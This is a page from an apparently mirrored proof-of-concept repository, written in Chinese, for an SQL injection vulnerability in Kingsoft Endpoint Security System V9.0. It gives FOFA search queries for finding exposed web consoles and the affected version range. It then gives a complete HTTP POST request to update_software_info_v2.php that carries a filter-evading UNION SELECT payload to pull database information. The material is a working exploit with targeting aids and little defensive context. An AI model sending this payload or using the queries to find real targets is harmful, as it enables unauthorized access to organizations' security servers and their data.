admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/金山/金山终端安全系统V9.0 SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

480 B
Raw Blame History

金山终端安全系统V9.0 SQL注入漏洞

fofa查询语法

app="金山终端安全系统V9.0Web控制台"
title=="用户登录-金山终端安全系统V9.0Web控制台"

影响版本

金山终端安全系统 V9.0 < V9.SP1.E1008

POC

POST /inter/update_software_info_v2.php HTTP/1.1 
Content-Type: application/x-www-form-urlencoded 
Host: ip:port
Content-Length: 81

type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1